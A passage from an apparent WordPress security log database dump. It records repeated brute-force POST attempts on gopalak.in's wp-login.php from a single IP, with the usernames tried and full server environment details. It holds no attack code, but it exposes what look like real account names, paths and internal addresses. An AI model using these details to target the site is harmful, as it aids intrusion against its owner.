tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747085734.346148;s:12:\"REQUEST_TIME\";i:1747085734;}}','43.205.255.0',1,'2025-05-13 03:05:36','2025-05-14 05:44:25'),(95747,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64781\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747085734.3468781;s:12:\"REQUEST_TIME\";i:1747085734;}}','43.205.255.0',1,'2025-05-13 03:05:36','2025-05-14 05:44:25'),(95748,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64786\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747085736.018147;s:12:\"REQUEST_TIME\";i:1747085736;}}','43.205.255.0',1,'2025-05-13 03:05:37','2025-05-14 05:44:25'),(95749,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64782\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747085736.0175281;s:12:\"REQUEST_TIME\";i:1747085736;}}','43.205.255.0',1,'2025-05-13 03:05:37','2025-05-14 05:44:25'),(95750,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64783\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747085736.9190099;s:12:\"REQUEST_TIME\";i:1747085736;}}','43.205.255.0',1,'2025-05-13 03:05:38','2025-05-14 05:44:25'),(95751,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59065\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747086373.5515521;s:12:\"REQUEST_TIME\";i:1747086373;}}','43.205.255.0',1,'2025-05-13 03:16:15','2025-05-14 05:44:25'),(95752,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59064\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747086373.550863;s:12:\"REQUEST_TIME\";i:1747086373;}}','43.205.255.0',1,'2025-05-13 03:16:15','2025-05-14 05:44:25'),(95753,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59059\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747086373.5481429;s:12:\"REQUEST_TIME\";i:1747086373;}}','43.205.255.0',1,'2025-05-13 03:16:15','2025-05-14 05:44:25'),(95754,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59061\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747086373.5482049;s:12:\"REQUEST_TIME\";i:1747086373;}}','43.205.255.0',1,'2025-05-13 03:16:15','2025-05-14 05:44:25'),(95755,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59060\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747086375.146507;s:12:\"REQUEST_TIME\";i:1747086375;}}','43.205.255.0',1,'2025-05-13 03:16:16','2025-05-14 05:44:25'),(95756,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55494\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087015.7894149;s:12:\"REQUEST_TIME\";i:1747087015;}}','43.205.255.0',1,'2025-05-13 03:26:57','2025-05-14 05:44:25'),(95757,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55500\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087015.788697;s:12:\"REQUEST_TIME\";i:1747087015;}}','43.205.255.0',1,'2025-05-13 03:26:57','2025-05-14 05:44:25'),(95758,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55498\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087015.7860119;s:12:\"REQUEST_TIME\";i:1747087015;}}','43.205.255.0',1,'2025-05-13 